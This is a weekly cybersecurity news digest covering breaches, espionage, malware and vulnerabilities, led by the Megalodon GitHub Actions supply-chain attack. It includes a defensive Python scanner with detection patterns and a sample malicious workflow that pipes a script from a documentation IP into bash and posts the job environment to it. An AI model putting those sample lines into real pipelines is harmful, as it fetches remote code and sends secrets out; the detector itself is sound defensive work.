
Megalodon backdoored 5,500 GitHub repositories in six hours. Not six days — six hours. Malicious commits silently replacing CI/CD workflows, hoovering tokens, cloud credentials, SSH keys, and environment variables before most of the affected projects had processed a single alert. The same week, IBM and Red Hat announced a $5 billion commitment, called Project Lightwell, to securing the open source supply chain, Anthropic's Mythos model surfaced 23,000 potential vulnerabilities across 1,000 OSS projects, and Apple open-sourced its quantum-resistant crypto stack with formal verification proofs attached. The industry's response to supply chain risk is finally arriving at a scale that looks serious.

The problem is the math. The response is measured in billions of dollars and multi-year programs. The attack is measured in hours and automated tooling. Megalodon's six-hour window isn't an anomaly — it's a benchmark. Last week it was TeamPCP and the GitHub cascade. The week before, Laravel Lang and malicious postinstall hooks across 700 repos. The investment in defense is real and necessary, but it's being deployed against a threat that doesn't need a budget cycle to iterate. Project Lightwell will fund important work. Megalodon already shipped.

Let’s now dive into this week’s top insights! 🚀


🔓 BREACHES & SECURITY INCIDENTS

🛳 Carnival Corporation confirmed a data breach that exposed nearly 6 million people’s information after attackers used social engineering to access its IT systems. Security researchers and Have I Been Pwned say the leaked data includes names, birth dates, emails, locations, and loyalty program details. The ShinyHunters gang claimed responsibility, and Carnival is investigating with outside security experts.

🇳🇱 Dutch police arrested a 35-year-old man suspected of repeatedly hacking Ajax’s computer systems. The breach exposed data on hundreds of fans and let the attacker alter tickets and stadium bans. Ajax patched the flaws and reported the incident to authorities.

🇺🇸 📡 Charter Communications says it suffered a data breach after the ShinyHunters extortion group threatened to leak stolen records. Charter claims no sensitive personal or CPNI data was exfiltrated and is notifying authorities. ShinyHunters say they accessed an employee's Microsoft Entra account and exported millions of customer records from Salesforce.

🇱🇹 Lithuania says over 600,000 national registry entries were leaked, likely by a foreign actor. Officials blocked accounts, tightened security, and the registry head resigned. Some suspect Russian involvement, but authorities have not named a country.

→ More breaches:

🥷🏻 CYBERCRIME, CYBER ESPIONAGE, APT’s

🇮🇷 Iran-linked MuddyWater ran an espionage campaign in early 2026 hitting at least nine organizations across four continents. The attackers used DLL side‑loading of signed binaries and Node.js/PowerShell implants to steal credentials, browser data, and stage exfiltration. Researchers say the tactics show quieter, more disciplined operations and improved operational hygiene.

🇨🇦 A Canadian man, Ramanan Pathmanathan, was sentenced to 33 years in U.S. prison for running an eight-year sextortion scheme targeting over 145 children, some as young as six. He pleaded guilty to coercion and child pornography charges, must register as a sex offender, and will serve 10 years supervised release on top of a prior 12-year Canadian sentence. Pathmanathan used fake social media accounts to coerce victims into sexual acts on video and threatened to share recordings.

🇷🇴 🇺🇸 A Romanian hacker, Catalin Dragomir, was sentenced in the U.S. to 4 years and 8 months for selling access to an Oregon state network. He admitted hacking the network in 2021, selling access and data from multiple U.S. organizations, and causing over $250,000 in losses. Dragomir was arrested in Romania, extradited to the U.S., and pleaded guilty to computer fraud and identity theft.

🇮🇷 🇺🇸 🚇 Security researchers say Iranian state-backed hackers breached the Los Angeles transit system in March. An Israeli firm, Gambit Security, ties the group Ababil of Minab to Iran’s Ministry of State Security. The attack fits a pattern of Iran-linked fake "hacktivist" groups targeting infrastructure.

🇮🇹 Italian police shut down the CINEMAGOAL piracy app that stole streaming auth codes to give users access to Netflix, Disney+, Spotify and more. The app used stolen decryption codes from fake subscriptions and routed streams through servers in Europe, earning operators millions and costing platforms about €300 million. Authorities seized servers, identified many subscribers, issued fines, and continue investigating resellers and other accomplices.

🇳🇱 🇷🇺 Dutch authorities seized over 800 servers and arrested two men tied to hosting companies that allegedly supported Russian cyberattacks and disinformation. Investigators say the firms routed Stark Industries’ infrastructure and helped sanctioned entities evade limits. The suspects deny wrongdoing while probes continue and services linked to the firms have been paused.

🗓️ {Cyber,Info}Sec Events — A community-maintained list of infosec conferences worldwide. Subscribe to the ICS calendar feed to get events straight into your calendar, or follow @[email protected] on Mastodon for weekly digests. Contributions and ⭐ welcome!

👨🏻‍⚖️ 👀 GOVERNMENT, POLITICS, AND PRIVACY

🇺🇸 🧬 California sued 23andMe for failing to protect genetic data after a 2023 breach that exposed nearly 7 million customers. The suit says the company ignored warning signs, did not require password resets or multifactor authentication, and misled the public. 23andMe previously agreed to a settlement worth up to $50 million over the breach.

🇳🇱 🇺🇸 The Dutch government blocked the sale of Solvinity, which runs the DigiD system, to U.S. firm Kyndryl over national security and digital sovereignty concerns. Officials cited risks from U.S. laws like the Cloud Act and potential dependence on foreign tech. Kyndryl said it was disappointed while Solvinity is consulting with authorities.

🦠 MALWARE & THREATS

Attackers are spreading GPU‑mining malware by poisoning search results and even manipulating AI chatbot recommendations. Users downloading popular utility tools get a ZIP that contains a legitimate program and a malicious DLL which installs remote access (ScreenConnect) and a hidden miner. The campaign focuses on high‑performance systems and uses stealth techniques to maximize GPU mining yield.

🎣 💬 Hackers are sending fake Signal Support messages to trick users into revealing their recovery keys for encrypted backups. If stolen, those keys could let attackers access old chats, photos, and documents. Signal warns it will never ask for recovery keys, PINs, or registration codes.

🎠 📲 BTMOB is an Android remote access trojan that can steal data and fully take over devices. It’s sold as an easy-to-use kit and spread via phishing, fake app stores, and social media. ESET warns it’s evolving fast and mainly seen in Latin America but can spread further.

CrowdStrike, with help from Google and Shadowserver, dismantled the Glassworm botnet by taking down four attacker-controlled servers. Glassworm had infected hundreds of open-source projects and abused developer tools to spread malware and steal data. The takedown disrupted the attackers’ infrastructure and aimed to slow future supply-chain attacks.

🇰🇵 Researchers say North Korea-linked Lazarus Group is using a memory-only RAT called RemotePE to target financial and crypto firms. RemotePE is loaded in stages by DPAPILoader and RemotePELoader and runs entirely in memory to avoid detection. The toolset is stealthy, under active development since 2023, and likely used for long-term spying and high-value theft.

🥷 Attackers hijacked Laravel Lang Git tags to distribute malicious Composer packages without changing the original source. The injected code downloaded a cross-platform credential stealer that harvests keys, tokens, passwords, and browser data. Developers should check versions, rotate credentials, and scan for signs of compromise.

🔙 🚪 A supply chain attack called Megalodon infected over 5,500 GitHub repositories with malicious commits that added or replaced GitHub Actions workflows. The malware stole many secrets — tokens, cloud credentials, SSH keys, and CI environment variables. The attack ran in a six-hour window and can trigger dormant backdoors via GitHub tokens.
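A defender's first question after a campaign like this is "which commits touched our workflows, and do the current workflow files do anything a CI job should not?" The script below is an added example written for this newsletter item; it is not code from the original post or from any project it mentions. It parses `git log --name-only --format=%H` output to list commits that touched `.github/workflows/`, then runs a few heuristic indicators over workflow text: serialising the whole `secrets` context, piping a downloaded script into a shell, decoding base64 payloads, posting to a raw IP, dumping the job environment, and referencing an unusually large number of distinct secrets. The indicator patterns, the threshold, and the two sample workflows are assumptions constructed for the example (the IP is a documentation address), not Megalodon signatures.

```python
"""Audit GitHub Actions workflows for secret-exfiltration indicators.

Added example, not the newsletter's or any project's code. The rules are
heuristics chosen for illustration; tune them before relying on them.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    line_no: int   # 0 for whole-file findings
    detail: str


# Heuristic indicators. Each is something a legitimate CI job rarely needs.
RULES = {
    # Serialises every repository secret in one expression.
    "secrets_dump": re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE),
    # Fetches a script from the network and pipes it straight into a shell.
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b"),
    # Decodes an obfuscated payload before running it.
    "base64_decode": re.compile(r"\bbase64\b\s+(-d|--decode)\b"),
    # Talks to a bare IP address instead of a named service.
    "post_to_raw_ip": re.compile(r"\b(curl|wget)\b[^\n]*https?://\d{1,3}(\.\d{1,3}){3}"),
    # Dumps the job environment, where secrets mapped via env: end up.
    "env_dump": re.compile(r"\b(env|printenv)\b\s*(\||>)"),
}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
HASH_LINE = re.compile(r"^[0-9a-f]{40}$")


def scan_workflow(text: str, max_secret_refs: int = 3) -> list[Finding]:
    """Return one Finding per matching rule per line, plus a whole-file
    finding when more than max_secret_refs distinct secrets are referenced."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES.items():
            if pattern.search(line):
                findings.append(Finding(rule, no, line.strip()))
    names = sorted(set(SECRET_REF.findall(text)))
    if len(names) > max_secret_refs:
        findings.append(Finding("many_secret_refs", 0, ", ".join(names)))
    return findings


def workflow_commits(git_log: str) -> list[tuple[str, list[str]]]:
    """Parse `git log --name-only --format=%H` output and keep only commits
    that touched files under .github/workflows/."""
    result, current, files = [], None, []
    for line in git_log.splitlines():
        if HASH_LINE.match(line):
            if current and files:
                result.append((current, files))
            current, files = line, []
        elif line.startswith(".github/workflows/"):
            files.append(line)
    if current and files:
        result.append((current, files))
    return result


# Constructed samples: an ordinary workflow and one with exfiltration traits.
BENIGN = """name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - run: npm publish
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

MALICIOUS = """name: ci
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    env:
      ALL: ${{ toJSON(secrets) }}
      AWS_KEY: ${{ secrets.AWS_ACCESS_KEY_ID }}
      AWS_SEC: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
      SSH: ${{ secrets.DEPLOY_SSH_KEY }}
      GH: ${{ secrets.GITHUB_TOKEN }}
    steps:
      - run: |
          curl -fsSL http://203.0.113.10/s.sh | bash
          env | curl -s -X POST --data-binary @- http://203.0.113.10/c
"""

# Constructed git log: only the second commit touched a workflow file.
GIT_LOG = (
    "a" * 40 + "\n\nREADME.md\nsrc/app.py\n\n"
    + "b" * 40 + "\n\n.github/workflows/ci.yml\nsrc/app.py\n\n"
)

if __name__ == "__main__":
    for sha, files in workflow_commits(GIT_LOG):
        print(f"workflow change in {sha[:12]}: {', '.join(files)}")
    for name, text in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(f"{name}: {len(scan_workflow(text))} finding(s)")
        for f in scan_workflow(text):
            print(f"  [{f.rule}] line {f.line_no}: {f.detail}")
```

In practice you would feed `git log --name-only --format=%H -- .github/workflows` from the repository and the current contents of each workflow file into these functions, then treat any hit as a reason to inspect the commit and rotate the secrets that workflow could reach. The rules are deliberately narrow so that ordinary workflows (one or two secrets, named hosts, no inline decoding) produce no findings.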

🇮🇷 🔙 🚪 Iran-linked group Nimbus Manticore used phishing, fake meeting invites, and SEO-poisoned sites to spread new backdoors called MiniJunk V2 and MiniFast. Check Point and Unit 42 say MiniFast shows signs of AI-assisted coding and gives long-term remote access and data exfiltration. The attacks targeted aviation, software, energy, and other sectors across the U.S., Europe, and the Middle East, ramping up after the February 2026 conflict.

🤖 🧰 AI, CRYPTO, TECH & TOOLS

🔐 IBM and Red Hat are investing $5 billion in Project Lightwell to secure open source software used by businesses. The project uses artificial intelligence to find and fix security problems in open source code. Many big banks and companies will take part to help protect important digital systems.

🇬🇧 🔫 The head of Britain’s GCHQ warned that AI is an “unstoppable force” that can be weaponized in cyberspace. She said AI is reshaping offense and defense, and agencies must rebuild cybersecurity around agentic AI. She also warned that China and Russia are using AI and cyber tools to boost their power and influence.

🧩 Anthropic added 28 security and compliance integrations to Claude so companies can govern the AI like other workplace tools. The Claude Compliance API sends conversation content and activity logs to existing security platforms for monitoring and policy enforcement. Supported vendors include CrowdStrike, Microsoft, Palo Alto Networks, Okta, Datadog, IBM and many others.

🍎 🔐 Apple open-sourced its quantum-resistant encryption code and the formal verification tools used to prove the code correct. The release includes ML-KEM and ML-DSA in Apple’s corecrypto library, used on billions of devices, plus a Cryptol-to-Isabelle translator and verification documentation. Apple says it combined formal proofs with conventional testing to catch subtle bugs and boost real-world security.

🐛 🧠 VULNERABILITIES, RESEARCH, AND THREAT INTELLIGENCE

➝ From the Patching Department:

Figure: Space Rogue’s LinkedIn post reacting to Microsoft’s stance on responsible vulnerability disclosures

🔎 A federal audit found NIST has mismanaged the National Vulnerability Database, causing a large backlog and poor planning. Analysts spend too much time on duplicate or unnecessary work, and NIST and CISA sometimes repeat each other’s efforts. The inspector general urged clearer plans, better coordination, and improved communication, and NIST agreed to fix the problems.

🩹 Security researchers found five linked bugs in Zapier that could have let an attacker control millions of user accounts. The chain began with a free account and ended with code that could act inside users’ browsers to run automations. Zapier fixed the issues after disclosure and says there is no evidence the flaws were exploited.

💥 Attackers exploited a critical FortiClient EMS flaw (CVE-2026-35616) to push a fake update that ran malicious PowerShell on managed endpoints. The payload stole browser data and saved it locally, while a PowerShell script exfiltrated the stolen data to an attacker server. Fortinet patched the vulnerability in FortiClient EMS 7.4.7 and later.

🔓 A four-year bug in Gitea’s container registry (CVE-2026-27771) let anyone pull images marked private without authentication. NoScope found about 31,750 of ~34,000 internet-facing Gitea instances were likely vulnerable, including ~4,000 production systems. Update to Gitea 1.26.2 or require authentication for registry access immediately.

🤖 Anthropic’s Claude Mythos model flagged over 23,000 potential vulnerabilities across more than 1,000 open-source projects. External reviews confirmed 1,726 issues so far, including over 1,000 rated high or critical, and Anthropic expects thousands more confirmations as scans continue. The company is sharing findings with vendors, has started patching some flaws, and plans to expand access while adding safeguards.

💥 A patched SQL injection bug in the Ghost CMS (CVE-2026-26980) has been widely exploited to hack over 700 sites. Attackers stole Admin API keys to inject malicious JavaScript and alter site content. Victims include big organizations and many personal blogs, and many owners did not respond to notifications.

🛰️ ICS, OT & IoT

The 2026 World Cup faces high cyber risk from criminal fraud, hacktivist DDoS/defacement, and state-linked disruptive or destructive operations. Fans, hospitality providers, ticketing/FanID systems, and host-city utilities are prime targets. Organizers should pre-coordinate multi-jurisdictional defenses, audit OT and exposed services, and run realistic incident exercises before kickoff.

💬 CONNECT

Follow me on Mastodon for quick daily updates and bite-sized content.

Prefer using an RSS feed? Add Infosec MASHUP to your feed here.

Enjoying our newsletter? Forward it to a colleague—it’s one of the best ways to support us.

Thanks for reading today’s newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58

See you next time!

-X.
